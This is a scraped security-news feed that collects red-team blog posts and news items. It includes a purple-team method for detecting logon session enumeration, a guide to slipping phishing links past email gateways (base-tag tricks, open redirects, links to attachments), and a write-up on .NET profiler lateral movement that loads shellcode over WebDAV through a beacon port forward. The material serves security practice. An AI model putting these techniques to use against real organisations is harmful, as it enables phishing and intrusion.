Normal view

There are new articles available, click to refresh the page.
Today — 26 June 2024Main stream
Yesterday — 25 June 2024Main stream

Phishing Attack Pentesting Guide

Phishing is probably one of the biggest issues for most organizations today, with network and endpoint defensive technology getting better and better, the bad guys aren’t trying to go after the though route and instead of going for the low hanging fruit. Phishing is one of those issues where training the employees is your best […]

La entrada Phishing Attack Pentesting Guide se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Before yesterdayMain stream

Deconstructing Logon Session Enumeration

21 June 2024 at 14:18

Purple Teaming

How we define and create test cases for our purple team runbooks

Intro

In our purple team service, we try to take a depth and quality approach and run many different functionally diverse test cases for a given technique. In this blog, I will describe our process of defining and implementing test cases for our purple team runbooks. The goal of this blog post is to provide the community with a bit more information about how we implement test cases for logon session enumeration, what preventative controls might be, and how this process can be applied to other techniques.

Defining Unique Test Cases

We wanted to develop a logical numbering system to separate test cases for each technique. After a couple of iterations of our purple team service, we started to deliberately select test cases and run variations based on three distinct categories:

  1. Distinct Procedures: Jared defines this as “a sequence of operations that, when combined, implement a technique or sub-technique.” We attempt to deconstruct tools that implement the technique to find functional differences, whether that tool is open-source or a Microsoft binary. This can require reverse engineering or reviewing source code to reveal what the tool is doing under the hood. It also might involve writing or altering existing tooling to meet your needs. An example of this can be found in part 1 of Jared’s blog On Detection: Tactical to Functional, where he reviews the source code of Mimikatz’s sekurlsa::logonPasswords module. If the tool implements a unique set of operations in the call graph, then we define that as a distinct procedure.
  2. Execution Modality: We then alter the execution modality, which changes how the set of functions is implemented. This is outlined in part 12 of Jared’s blog On Detection: Tactical to Functional: “one tool that is built into the operating system (Built-in Console Application), a tool that had to be dropped to disk (Third-Party Console Application), a tool that could run in PowerShell’s memory (PowerShell Script), a tool that runs in the memory of an arbitrary process (Beacon Object File), and a tool that can run via a proxy without ever touching the subject endpoint (Direct RPC Request)”. This variation helps us determine if we run the same distinct procedure but with a different execution mechanism (Beacon Object File, Unmanaged PowerShell, etc.) or is implemented in a different programming language (C, Python, PowerShell, etc.) will alter whether your security controls detected or prevented it.
  3. Minor Variations: Finally, we introduce slight variations to alter the payload, target user, computer, or process depending on the technique we are working on. In the case of logon session enumeration, we alter local vs. remote logon sessions and the machine we are targeting (i.e., file server, workstation, etc). During purple team assessments, we often find ourselves using this variation based on the organization’s environmental factors. For other techniques, these environmental factors normally include choosing which account to Kerberoast or which process to inject into.

Defining test cases in this manner allows us to triangulate a technique’s coverage estimation rather than treat the techniques in the MITRE ATT&CK matrix as a bingo card where we run net session and net1 session, fill in the box for this technique, and move on to the next one. After running each test case during the purple team assessment, we look for whether the test case was prevented, detected, or observed (telemetry) by any security controls the organization may have.

Deconstructing Distinct Logon Session Enumeration Procedures

Let’s dive into logon session enumeration by deconstructing the functional differences between three distinct procedures. If you want to learn more (or want to apply this methodology yourself), you can find out more about the process we use to examine the function call stack of tools in Nathan’s Beyond Procedures: Digging into the Function Call Stack and Jared’s On Detection: Tactical to Functional series.

We can start by examining the three distinct procedures that SharpHound implements. Rohan blogged about the three different methods SharpHound uses. SharpHound can attempt to use all three depending on the context it’s running under and what arguments are passed to it. The implementation of each procedure can be found here: NetSessionEnum, NetWkstaEnum, and GetSubKeyNames in the SharpHoundCommon library. Matt also talks about this in his BOFHound: Session Integration blog.

Here is a breakdown of each of the three unique procedures implemented in SharpHound for remote session enumeration:

Distinct Procedure #1: Network Session Enumeration (NetSessionEnum)

NetSessionEnum is a Win32 API implemented in netapi32.dll. The image below shows where each tool is implemented in the function call stack:

NetSessionEnum Function Call Graph

This Win32 API returns a list of active remote or network logon sessions. These two blogs (Netwrix and Compass Security) go into detail about which operating systems allow “Authenticated Users” to query logon sessions and how to check and restrict access to this API remotely by altering the security descriptor in the HKLM/SYSTEM/CurrentControlSet/Services/LanmanServer/DefaultSecurity/SrvsvcSessionInfo registry key. If we read Microsoft’s documentation on the RPC server, we see the MS-SRVS RPC server is only implemented via the \PIPE\srvsvc named pipe (RPC servers can also be commonly implemented via TCP as well). As Microsoft’s documentation states, named pipes communicate over CIFS\SMB via port 445.

In our purple team service, we usually target the organization’s most active file server for two reasons. First, port 445 (SMB) will generally be open from everywhere on the internal network for this server. Second, this server has the most value to an attacker since it could contain hundreds or even thousands of user-to-machine mappings an attacker could use for “user hunting.”

Distinct Procedure #2: Interactive, Service, and Batch Logon Session Enumeration (NetWkstaUserEnum)

NetWkstaUserEnum is also a Win32 API implemented in netapi32.dll. Below is the breakdown of the function call stack and where each tool is implemented:

NetWkstaUserEnum Function Call Graph

As Microsoft documentation says: “This list includes interactive, service, and batch logons” and “Members of the Administrators, and the Server, System, and Print Operator local groups can also view information.” This API call has different permission requirements and returns a different set of information than the NetSessionEnum API call; however, just like NetSessionEnum, the RPC server is implemented only via the \PIPE\wkssvc named pipe. Again, this blog from Compass Security goes into more detail about the requirements.

Since this, by default, requires administrator or other privileged rights on the target machine, we will again attempt to target file servers and usually get an access denied response when running this procedure. As a detection engineer, if someone attempts to enumerate sessions, do we have the telemetry even if they are unsuccessful? Next, we will attempt to target a workstation on which we have administrator rights to enumerate sessions using this minor variation in a different test case.

Distinct Procedure #3: Interactive Session Enumeration (RegEnumKeyExW)

Note: I’m only showing the function call stack of RegEnumKeyExW, SharpHound calls OpenRemoteBaseKey to get a handle to the remote key before calling RegEnumKeyExW. I also left out calls to API sets in this graph.

RegEnumKeyExW is, again, a Win32 API implemented in advapi32.dll. Below is the breakdown of the function call stack and where each tool is implemented:

RegEnumKeyExW Function Call Graph

As Microsoft documentation says, the remote system “requires the Remote Registry service to be running on the remote computer.” Again, this blog from Compass Security goes into more detail about the requirements, but by default, the service is disabled on workstation operating systems like Windows 11 and 10 and set to trigger start on server operating systems by interacting with the \PIPE\winreg named pipe. If the remote registry service is running (or triggerable), then the HKEY_USERS hive can be queried for a list of subkeys. These subkeys contain SIDs for users that are interactively logged on. Like NetWkstaUserEnum and NetSessionEnum, the RPC server is implemented only via the \PIPE\winreg named pipe.

Putting it all Together with Test Cases

Now that we have a diverse set of procedures and tooling examples that use a variety of execution modalities, we can start creating test cases to run for this technique. Below, I have included an example set of test cases and associated numbering system using each of the three distinct procedures and altering the execution modality for each one.

You can also find a full TOML runbook for the examples below here: https://ghst.ly/session-enumeration-runbook. All of the test cases are free or open source and can be executed via an Apollo agent with the Mythic C2 framework.

For example, our numbering looks like: Test Case X.Y.Z

  • X — Distinct Procedure
  • Y — Execution Modality
  • Z — Minor Variation

A sample set of test cases we might include:

Network Session Enumeration (NetSessionEnum)

  • Test Case 1.0.0 — Enumerate SMB Sessions From Third-Party Utility On Disk (NetSess)
  • Test Case 1.1.0 — Enumerate SMB Sessions via Beacon Object File (BOF) — get-netsession
  • Test Case 1.2.0 — Enumerate SMB Sessions via PowerView’s Get-NetSession
  • Test Case 1.3.0 — Enumerate SMB Sessions via Proxied RPC

Interactive, Service, and Batch Logon Session Enumeration (NetWkstaUserEnum)

  • Test Case 2.0.0 — Enumerate Interactive, Service, and Batch Logon Sessions from BOF (netloggedon) — Server
  • Test Case 2.0.1 — Enumerate Interactive, Service, and Batch Logon Sessions from BOF (netloggedon) — Workstation
  • Test Case 2.1.0 — Enumerate Interactive, Service, and Batch Logon Sessions from Impacket (netloggedon.py)
  • Test Case 2.2.0 — Enumerate SMB Sessions via PowerView’s Get-NetLoggedOn

Interactive Session Enumeration (RegEnumKeyExW)

  • Test Case 3.0.0 — Enumerate Interactive Sessions via reg_query BOF (Server)
  • Test Case 3.0.1 — Enumerate Interactive Logon Sessions via reg_query BOF (workstation)
  • Test Case 3.1.0 — Enumerate Interactive Sessions from Impacket (reg.py)

After executing each test case, we can determine if the test case was prevented, detected, or observed. Tracking information like this allows us to provide feedback on your controls and predict how likely they would detect or prevent an adversary’s arbitrary selection of procedure or execution modality. Also, we space test cases about 10 minutes apart; name artifacts like files, registry keys, and processes by their corresponding test case number; and alternate the machine and source user we are executing from to make finding observable telemetry easier. We may include or exclude certain test cases based on the organization’s security controls. For example, if they block and alert on all powershell.exe usage, we aren’t going to run 40 test cases across multiple techniques that attempt to call the PowerShell binary.

Conclusion

By researching and deconstructing each tool and looking at the underlying function call stacks, we found that regardless of which distinct procedure or execution modality was used, they all used three different RPC servers, each implemented using named pipes. This will also allow us to triangulate detection coverage and help determine if a custom or vendor-based rule is looking for a brittle indicator or a tool-specific detail\toolmark.

We now have a fairly broad set of test cases for a runbook that accounts for a wide variety of attacker tradecraft for this technique. Knowing this as a blue teamer or detection engineer will allow me to implement a much more comprehensive detection strategy for this particular technique around the three named pipes we discovered. This allows us to write robust detection rules, rather than looking for the string “Get-NetSession” in a PowerShell script. Would this produce a perfect detection for session enumeration? No. Does this include every single way an attacker can determine where a user is logged? No. Does deconstructing adversary tradecraft in this manner vastly improve our coverage for the technique? Absolutely.

In my next post, I will cover many log sources native to Windows (I’m counting Sysmon as native) and a couple of EDRs that allow us to detect logon session enumeration via named pipes (or TCP in some cases). Some of these sources you might be familiar with, others aren’t very well documented. Each of these log sources can be enabled and shipped to a centralized place like a SIEM. Each source has its requirements, provides a different context, and has its pros and cons for use in a detection rule.

References


Deconstructing Logon Session Enumeration was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Deconstructing Logon Session Enumeration appeared first on Security Boulevard.

EU Aims to Ban Math — ‘Chat Control 2.0’ Law is Paused but not Stopped

20 June 2024 at 12:43
“Oh, won’t somebody please think of the children?”

Ongoing European Union quest to break end-to-end encryption (E2EE) mysteriously disappears.

The post EU Aims to Ban Math — ‘Chat Control 2.0’ Law is Paused but not Stopped appeared first on Security Boulevard.

Cybercriminals Target Trump Supporters with Donation Scams

18 June 2024 at 17:47
Trump donation scam

Donald Trump’s presidential campaign is known for aggressively trying to raise money, even sending emails to donors hoping to cash in on setbacks like his conviction late last month on 34 felony counts for illegally influencing the 2016 campaign. Bad actors now are trying to do the same, running donation scams by impersonating the campaign..

The post Cybercriminals Target Trump Supporters with Donation Scams appeared first on Security Boulevard.

Feeding the Phishes

18 June 2024 at 09:21

PHISHING SCHOOL

Bypassing Phishing Link Filters

You could have a solid pretext that slips right by your target secure email gateway (SEG); however, if your link looks too sketchy (or, you know, “smells phishy”), your phish could go belly-up before it even gets a bite. That’s why I tend to think of link filters as their own separate control. Let’s talk briefly about how these link filters work and then explore some ways we might be able to bypass them.

What the Filter? (WTF)

Over the past few years, I’ve noticed a growing interest in detecting phishing based on the links themselves–or, at least, there are several very popular SEGs that place a very high weight on the presence of a link in an email. I’ve seen so much of this that I have made this type of detection one of my first troubleshooting steps when a SEG blocks me. I’ll simply remove all links from an email and check if the message content gets through.

In at least one case, I encountered a SEG that blocked ANY email that contained a link to ANY unrecognized domain, no matter what the wording or subject line said. In this case, I believe my client was curating a list of allowed domains and instructed the SEG to block everything else. It’s an extreme measure, but I think it is a very valid concern. Emails with links are inherently riskier than emails that do not contain links; therefore, most modern SEGs will increase the SPAM score of any message that contains a link and often will apply additional scrutiny to the links themselves.

How Link Filters Work — Finding the Links

If a SEG filters links in an email, it will first need to detect/parse each link in the content. To do this, almost any experienced software engineer will directly go to using Regular Expressions (“regex” for short):

Stand back! I know regular expressions

To which, any other experienced software engineer will be quick to remind us that while regex is extremely powerful, it is also easy to screw up:

99 problems (and regex is one)

As an example, here are just a few of the top regex filters I found for parsing links on stackoverflow:

(http|ftp|https):\/\/([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:\/~+#-]*[\w@?^=%&\/~+#-])

(?:(?:https?|ftp|file):\/\/|www\.|ftp\.)(?:\([-A-Z0–9+&@#\/%=~_|$?!:,.]*\)|[-A-Z0–9+&@#\/%=~_|$?!:,.])*(?:\([-A-Z0–9+&@#\/%=~_|$?!:,.]*\)|[A-Z0–9+&@#\/%=~_|$])

(?:(?:https?|ftp):\/\/)?[\w/\-?=%.]+\.[\w/\-&?=%.]+

([\w+]+\:\/\/)?([\w\d-]+\.)*[\w-]+[\.\:]\w+([\/\?\=\&\#\.]?[\w-]+)*\/?

(?i)\b((?:[a-z][\w-]+:(?:/{1,3}|[a-z0–9%])|www\d{0,3}[.]|[a-z0–9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:’”.,<>?«»“”‘’]))

Don’t worry if you don’t know what any of these mean. I consider myself to be well versed in regex and even I have no opinion on which of these options would be better than the others. However, there are a couple things I would like to note from these examples:

  1. There is no “right” answer; URLs can be very complex
  2. Most (but not all) are looking for strings that start with “http” or something similar

These are also some of the most popular (think “smart people”) answers to this problem of parsing links. I could also imagine that some software engineers would take a more naive approach of searching for all anchor (“<a>”) HTML tags or looking for “href=” to indicate the start of a link. No matter which solution the software engineer chooses, there are likely going to be at least some valid URLs that their parser doesn’t catch and might leave room for a categorical bypass. We might also be able to evade parsers if we can avoid the common indicators like “http” or break up our link into multiple sections.

Side Note: Did you see that some of these popular URL parsers account for FTP and some don’t? Did you know that most browsers can connect to FTP shares? Have you ever tried to deliver a phishing payload over an anonymous FTP link?

How Link Filters Work — Filtering the Links

Once a SEG has parsed out all the links in an email, how should it determine which ones look legitimate and which ones don’t? Most SEGs these days look at two major factors for each link:

  1. The reputation of the domain
  2. How the link “looks”

Checking the domain reputation is pretty straightforward; you just split the link to see what’s between the first two forward slashes (“//”) and the next forward slash (“/”) and look up the resulting domain or subdomain on Virustotal or similar. Many SEGs will share intelligence on known bad domains with other security products and vice versa. If your domain has been flagged as malicious, the SEG will either block the email or remove the link.

As far as checking how the link “looks”, most SEGs these days use artificial intelligence or machine learning (i.e., AI/ML) to categorize links as malicious or benign. These AI models have been trained on a large volume of known-bad links and can detect themes and patterns commonly used by SPAM authors. As phishers, I think it’s important for us to focus on the “known-bad” part of that statement.

I’ve seen one researcher’s talk who claimed their AI model was able to detect over 98% of malicious links from their training data. At first glance, this seems like a very impressive number; however, we need to keep in mind that in order to have a training set of malicious links in the first place, humans had to detect 100% of the training set as malicious. Therefore, the AI model was only 98% as good as a human at detecting phishing links solely on the “look” of the link. I would imagine that it would do much worse on a set of unknown-bad links, if there was a way to hypothetically attain such a set. To slip through the cracks, we should aim to put our links in that unknown-bad category.

Even though we are up against AI models, I like to remind myself that these models can only be trained on human-curated data and therefore can only theoretically approach the competence of a human, but not surpass humans at this task. If we can make our links look convincing enough for a human, the AI should not give us any trouble.

Bypassing Link Filters

Given what we now know about how link filters work, we should have two main tactics available to us for bypassing the filter:

  1. Format our link so that it slips through the link parsing phase
  2. Make our link “look” more legitimate

If the parser doesn’t register our link as a link, then it can’t apply any additional scrutiny to the location. If we can make our link location look like some legitimate link, then even if we can’t bypass the parser, we might get the green light anyway. Please note that these approaches are not mutually exclusive and you might have greater success mixing techniques.

Bypassing the Parser

Don’t use an anchor tag

One of the most basic parser bypasses I have found for some SEGs is to simply leave the link URL in plaintext by removing the hyperlink in Outlook. Normally, link URLs are placed in the “hypertext reference” (href) attribute of an HTML anchor tag (<a>). As I mentioned earlier, one naive but surprisingly common solution for parsing links is to use an HTML parsing library like BeautifulSoup in Python. For example:

soup = BeautifulSoup(email.content, 'html.parser')
links = soup.find_all("a") # Find all elements with the tag <a>
for link in links:
print("Link:", link.get("href"), "Text:", link.string)

Any SEG that uses this approach to parse links won’t see a URL outside of an anchor tag. While a URL that is not a clickable link might look a little odd to the end user, it’s generally worth the tradeoff when this bypass works. In many cases, mail clients will parse and display URLs as hyperlinks even if they are not in an anchor tag; therefore, there is usually little to no downside of using this technique.

Use a Base Tag (a.k.a BaseStriker Attack)

One interesting method of bypassing some link filters is to use a little-known HTML tag called “base”. This tag allows you to set the base domain for any links that use relative references (i.e., links with hrefs that start with “/something” instead of direct references like “https://example.com/something”). In this case, the “https://example.com” would be considered the “base” of the URL. By defining the base using the HTML base tag in the header of the HTML content, you can then use just relative references in the body of the message. While HTML headers frequently contain URLs for things like CSS or XML schemas, the header is usually not expected to contain anything malicious and may be overlooked by a link parser. This technique is known as the “BaseStriker” attack and has been known to work against some very popular SEGs:

https://www.cyberdefensemagazine.com/basestriker-attack-technique-allow-to-bypass-microsoft-office-365-anti-phishing-filter/

The reason why this technique works is because you essentially break your link into two pieces: the domain is in the HTML headers, and the rest of the URL is in your anchor tags in the body. Because the hrefs for the anchor tags don’t start with “https://” they aren’t detected as links.

Scheming Little Bypasses

The first part of a URL, before the colon and forward slashes, is what’s known as the “scheme”:

URI = scheme ":" ["//" authority] path ["?" query] ["#" fragment]

As mentioned earlier, some of the more robust ways to detect URLs is by looking for anything that looks like a scheme (e.g. “http://”, or “https://”), followed by a sequence of characters that would be allowed in a URL. If we simply leave off the scheme, many link parsers will not be able to detect our URL, but it will still look like a URL to a human:

accounts.goooogle.com/login?id=34567

A human might easily be convinced to simply copy and paste this link into their browser for us. In addition, there are quite a few legitimate schemes that could open a program on our target user’s system and potentially slip through a URL parser that is only looking for web links:

https://en.wikipedia.org/wiki/List_of_URI_schemes

There are at least a few that could be very useful as phishing links ;)

QR Phishing

What if there isn’t a link in the email at all? What if it’s an image instead? You can use a tool like SquarePhish to automate phishing with QR codes instead of traditional links:

GitHub - secureworks/squarephish

I haven’t played with this yet, but have heard good things from friends that have used similar techniques. If you want to play with automating this attack yourself, NodeJS has a simple library for generating QRs:

qrcode

Bypassing the Filter

Don’t Mask

(Hold on. I need to get on my soapbox…) I can’t count how many times I’ve been blocked because of a masked link only to find that unmasking the link would get the same pretext through. I think this is because spammers have thoroughly abused this feature of anchor tags in the past and average email users seldom use masked links. Link filters tend to see masked links as far more dangerous than regular links; therefore, just use a regular link. It seems like everyone these days knows how to hover a link and check its real location anyway, so masked links are even bad at tricking humans now. Don’t be cliche. Don’t use masked links.

Use Categorized Domains

Many link filters block or remove links to domains that are either uncategorized, categorized as malicious, or were recently registered. Therefore, it’s generally a good idea to use domains that have been parked long enough to be categorized. We’ve already touched on this in “One Phish Two Phish, Red Teams Spew Phish”, so I’ll skip the process of getting a good domain; however, just know that the same rules apply here.

Use “Legitimate” Domains

If you don’t want to go through all the trouble of maintaining categorized domains for phishing links, there are some generally trustworthy domains you can leverage instead. One example I recently saw “in-the-wild” was a spammer using a sites.google.com link. They just hosted their phishing page on Google! I thought this was brilliant because I would expect most link filters to allow Google, and even most end users would think anything on google.com must be legit. Some other similar examples would be hosting your phishing sites as static pages on GitHub, in an S3 bucket, other common content delivery networks (CDNs), or on SharePoint, etc. There are tons of seemingly “legitimate” sites that allow users to host pages of arbitrary HTML content.

Arbitrary Redirects

Along the same lines as hosting your phishing site on a trusted domain is using trusted domains to redirect to your phishing site. One classic example of this would be link shorteners like TinyURL. While TinyURL has been abused for SPAM to the point that I would expect most SEGs to block TinyURL links, it does demonstrate the usefulness of arbitrary redirects.

A more useful form of arbitrary redirect for bypassing link filters are URLs with either cross-site scripting (XSS) vulnerabilities that allow us to specify a ‘window.location’ change or URLs that take an HTTP GET parameter specifying where the page should redirect to. As part of my reconnaissance phase, I like to spend at least a few minutes on the main website of my target to look for these types of vulnerabilities. These vulnerabilities are surprisingly common and while an arbitrary redirect might be considered a low-risk finding on a web application penetration test report, they can be extremely useful when combined with phishing. Your links will point to a URL on your target organization’s main website. It is extremely unlikely that a link filter or even a human will see the danger. In some cases, you may find that your target organization has configured an explicit allow list in the SEG for links that point to their domains.

Link to an Attachment

Did you know that links in an email can also point to an email attachment? Instead of providing a URL in the href of your anchor tag, you can specify the content identifier (CID) of the attachment (e.g. href=“cid:mycontentidentifier@content.net”). One way I have used this trick to bypass link filters is to link to an HTML attachment and use obfuscated JavaScript to redirect the user to the phishing site. Because our href does not look like a URL, most SEGs will think our link is benign. You could also link to a PDF, DOCX, or several other usually allowed file types that then contain the real phishing link. This might require a little more setup in your pretext to instruct the user, or just hope that they will click the link after opening the document. In this case, I think it makes the most sense to add any additional instructions inside the document where the contents are less likely to be scrutinized by the SEG’s content filter.

Pick Up The Phone

This blog rounds out our “message inbound” controls that we have to bypass for social engineering pretexts. It would not be complete without mentioning one of the simplest bypasses of them all:

Not using email!

If you pick up the phone and talk directly to your target, your pretext travels from your mouth, through the phone, then directly into their ear, and hits their brain without ever passing through a content or reputation filter.

Along the same lines, Zoom calls, Teams chats, LinkedIn messaging, and just about any other common business communication channel will likely be subject to far fewer controls than email. I’ve trained quite a few red teamers who prefer phone calls over emails because it greatly simplifies their workflow. Just a few awkward calls is usually all it takes to cede access to a target environment.

More interactive forms of communication, like phone calls, also allow you to gauge how the target is feeling about your pretext in real time. It’s usually obvious within seconds whether someone believes you and wants to help or if they think you’re full of it and it’s time to cut your losses, hang up the phone, and try someone else. You can also use phone calls as a way to prime a target for a follow-up email to add perceived legitimacy. Getting our message to the user is half the battle, and social engineering phone calls can be a powerful shortcut.

In Summary

If you need to bypass a link filter, either:

  1. Make your link look like it’s not a link
  2. Make your link look like a “legitimate” link

People still use links in emails all the time. You just need to blend in with the “real” ones and you can trick the filter. If you are really in a pinch, just call your targets instead. It feels more personal, but it gets the job done quickly.


Feeding the Phishes was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Feeding the Phishes appeared first on Security Boulevard.

Netcraft Uses Its AI Platform to Trick and Track Online Scammers

13 June 2024 at 14:00
romance scams generative AI pig butchering

At the RSA Conference last month, Netcraft introduced a generative AI-powered platform designed to interact with cybercriminals to gain insights into the operations of the conversational scams they’re running and disrupt their attacks. At the time, Ryan Woodley, CEO of the London-based company that offers a range of services from phishing detection to brand, domain,..

The post Netcraft Uses Its AI Platform to Trick and Track Online Scammers appeared first on Security Boulevard.

Tile/Life360 Breach: ‘Millions’ of Users’ Data at Risk

13 June 2024 at 13:28
Life360 CEO Chris Hulls

Location tracking service leaks PII, because—incompetence? Seems almost TOO easy.

The post Tile/Life360 Breach: ‘Millions’ of Users’ Data at Risk appeared first on Security Boulevard.

Streamlining CLI Authentication: Implementing OAuth Login in Python

By: Guardians
12 June 2024 at 11:43

When building an application that requires user authentication, implementing a secure login flow is critical. In this article, we'll walk through how we created a robust OAuth login flow for ggshield, our Python-based command line tool, to streamline the onboarding process for our users.

The post Streamlining CLI Authentication: Implementing OAuth Login in Python appeared first on Security Boulevard.

Lateral Movement with the .NET Profiler

11 June 2024 at 12:35

Lateral Movement with the .NET Profiler

The accompanying code for this blogpost can be found HERE.

Intro

I spend a lot of my free time modding Unity games. Since Unity is written in C#, the games are very easy to work with compared to those that compile to unmanaged code. This makes it a perfect hobby project to pick up and set down without getting too sweaty.

As I got deeper into modding C# games, I realized that hooking functions is actually slightly more complicated than it is in unmanaged programs, which is counterintuitive because just about everything else is much, much easier.

For unmanaged code, hooking functions is relatively straightforward. The basic steps are:

  • Allocate some memory to house the code you want to run when a function is called and write your instructions there
  • Overwrite the beginning of the original function’s instructions to jump to your new code
  • Handle all the fiddly details necessary to ensure that the program’s execution gets back to the original function and that the stack isn’t sloppy joe meat by the end of it

With .NET and Mono, it isn’t as simple. .NET assemblies’ functions are made up of a binary instruction set known as the Common Intermediate Language (CIL) that gets just-in-time (JIT) compiled to machine instructions at runtime by the Common Language Runtime (CLR).

The main issue with attempting to hook managed code is that by the time you inject into the process you want to hook a function in, the target function may have already been JIT’ed and if so, the CLR the has cached the x86 instructions that it gets translated into. If you modify the CIL bytecode and the function gets called again, the CLR may just execute the cached x86 instructions that were compiled before your modifications. In addition to this issue, there are myriad little corner cases that make this a big headache. (Although in reality, this is a solved problem. There have been many great solutions and frameworks built to make this easy for developers, such as Harmony and MonoMod, but I was still curious to learn more about it.)

.NET Profilers

In my googling for hooking solutions, I came across Microsoft’s .NET profiling API, which wasn’t that helpful for my modding needs, but it did seem to have some handy primitives for red teaming! It is designed to allow for instrumentation of .NET processes by implementing a callback interface in an unmanaged COM server DLL that gets loaded into a given .NET process.

The CLR then calls functions from the interface when different events happen during execution. For pretty much anything that goes on in the CLR, you can implement a callback that gets called to inspect and manipulate behavior at runtime, such as when assemblies and modules are loaded, when functions are JIT compiled, and much more. Just look at all these callbacks, and this isn’t even all of them!

.NET Profiling API Callbacks

For more information about the basics of how these profilers work, I recommend watching this talk by Pavel Yosifovich. It was far and away the most valuable resource I found:

https://medium.com/media/78a9180af2b2ea4398572c48ce6ffdd6/href

The Offensive Value of the .NET Profiler

Execution and Persistence:

Upon execution, the CLR for a given process examines the environment variables for three specific variables that cause a profiling DLL to be loaded:

Profiler-Specific Environment Variables
  • COR_ENABLE_PROFILING — This is a flag that enables profiling for the given process if set to 1, meaning the profiler DLL will be loaded into the process
  • COR_PROFILER — This is the CLSID that will be handed to the profiler DLL to see if it is the correct COM server. The profiler DLL can choose not to check this though and load no matter what this CLSID is
  • COR_PROFILER_PATH — The path to the profiler DLL that will be loaded

If all of these variables are present, profiling is enabled, and the DLL exists on disk, the profiler DLL will be loaded into the process at the start of execution. This gives us a pretty nice code execution primitive to load a DLL into an arbitrary .NET process.

This has been documented for some time and observed used by threat actors in the wild. I ran across this blog by Bohops detailing other interesting abuses of the .NET profiling infrastructure in Windows. It references a blog by Casey Smith from 2017 detailing loading a DLL this way, and MITRE has a technique for this as well as some in-the-wild examples.

Since environment variables can be set system-wide, this means that this also works as form of persistence. Whenever a .NET process executes, it will load the specified DLL.

The minimum viable profiler that can abuse this is a “fake” COM server DLL that exports the function DllGetClassObject, which is the function that is used to check the CLSID of the COM server DLL. As stated above though, there’s no need to actually implement the logic of the check here, and arbitrary code can be executed instead:

Minimum viable “fake” profiler
Execution of the “fake” profiler in a .NET process

Lateral Movement:

I was talking to Lee Chagolla-Christensen (@tifkin) about ways to set these environment variables on a remote computer to load a DLL via UNC paths, and he let me know that the Win32_ProcessStartup WMI class allows for environment variables to be set for a specific process, meaning that this could be abused with a Win32_Process Create call to execute a .NET process remotely and load a .NET profiler DLL! Thanks Lee!

So I set about creating a BOF and Payload to allow this to be used more easily. There results are HERE.

I modified Yaxser’s WMI Lateral Movement BOF to include a Win32_ProcessStartup class with the appropriate environment variables defined and a user-defined DLL path to enable lateral movement via the .NET profiler.

Adding environment variables to enable WMI lateral movement

Additionally, I modified Pavel Yosifovich’s example .NET profiler to be a better payload. I utilized this tutorial from ired.team to store a shellcode payload as a resource that can be hot swapped, and I used the function ICorProfilerInfo2::SetEnterLeaveFunctionHooks2 to set an enter hook on all JITed functions. The hook will load and execute the shellcode from the resource, essentially performing process hollowing, because normal functionality of the hooked function will cease indefinitely if the payload is something like a Cobalt Strike beacon.

Setting the hooks during initialization
Adding the shellcode execution to the function enter hook

In that same file, CoreProfiler.cpp, you can see all the other handy callbacks that could be used for execution primitives or even more interesting use cases. A neat example that uses the .NET profiler for evasion is Omer Yair’s InvisiShell, which monitors assembly loads in PowerShell processes to then patch out functions to disable AMSI. I believe there’s a lot of fertile ground here for further research regarding all the callbacks exposed by the CLR.

Putting it all together

When we use the payload and BOF together, you get lateral movement that looks something like this:

.NET Profiler BOF execution

You might be thinking: “hey Dan! Didn’t you say earlier you wanted to load the payload from a UNC path?” Yes I did, good memory. Sadly since we are using WMI we run into the double hop problem, meaning the process we execute on the remote machine can’t authenticate to a remote file share to pull our payload via a UNC path. That’s ok though, because the DLL can instead be loaded from a WebDAV server:

.NET Profiler BOF execution featuring WebDAV

You can even set it up to be through the beacon you are executing the BOF with by utilizing wsgidav. First execute this command to host your server locally on your workstation:

wsgidav --host=0.0.0.0 --port=80 --root=/payload/folder --auth=anonymous

and then start a reverse portforward on your beacon:

rportfwd 80 localhost 80

Now you can execute a .NET process, have your payload pulled over automatically, and executed.

Conclusion

I found this “feature” of the .NET Profiler to be pretty neat albeit a little unwieldy. You’ll see that the payload is purely for demonstration purposes. No attempts to make it evasive have been made so defender may eat it upon being built. Sorry!

I hope this gets folks more curious about all the cool stuff you can do with the .NET profiler though, and I’m sure there are other ways out there to remotely set environment variables to make it even more useful. I briefly looked into setx and other means of setting them via remote registry, but it seemed like the changes didn’t take effect until after a reboot. I bet there is some way to make it work though!

Many thanks again to Lee, Pavel, Yaxser, and Mantvydas for all the prior research, since the payload and BOF is really just a collage of your work.


Lateral Movement with the .NET Profiler was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Lateral Movement with the .NET Profiler appeared first on Security Boulevard.

Ticketmaster is Tip of Iceberg: 165+ Snowflake Customers Hacked

11 June 2024 at 11:15
Snowflake CISO Brad Jones

Not our fault, says CISO: “UNC5537” breached at least 165 Snowflake instances, including Ticketmaster, LendingTree and, allegedly, Advance Auto Parts.

The post Ticketmaster is Tip of Iceberg: 165+ Snowflake Customers Hacked appeared first on Security Boulevard.

Ghostwriter v4.2

10 June 2024 at 16:01

Ghostwriter v4.2: Project Documents & Reporting Enhancements

After April’s massive Ghostwriter v4.1 release, we received some great feedback and ideas. We got a little carried away working on these and created a release so big we had to call it v4.2. This release contains some fantastic changes and additions to the features introduced in April’s release. Let’s get to the highlights!

Improving Customizable Fields

Ghostwriter v4.1 introduced custom fields, and seeing the community use them so creatively was awesome. What we saw gave us some ideas for a few big improvements.

The rich text fields support the Jinja2 templating language, so loops quickly became a talking point. Looping over project objectives, findings, hosts, and other things to create dynamic lists, table rows, or sections is incredibly powerful, so we had to do it.

You can now use Jinja2-style expressions with the new li, tr, and p tags to create list items, table rows, and text sections. Here is an example of building a dynamic list inside Ghostwriter’s WYSIWYG editor.

Jinja2-style Loop in the WYSIWYG Editor

This screenshot includes examples of a few notable features. We’re using the new li tag with a for loop to create a bulleted list of findings. We have access to Jinja2 filters, including Ghostwriter’s custom filters, so we use the filter_severity filter to limit the loop to findings with a severity rating matching critical, high, or medium. The first and last bullets won’t be in the list in the final Word document.

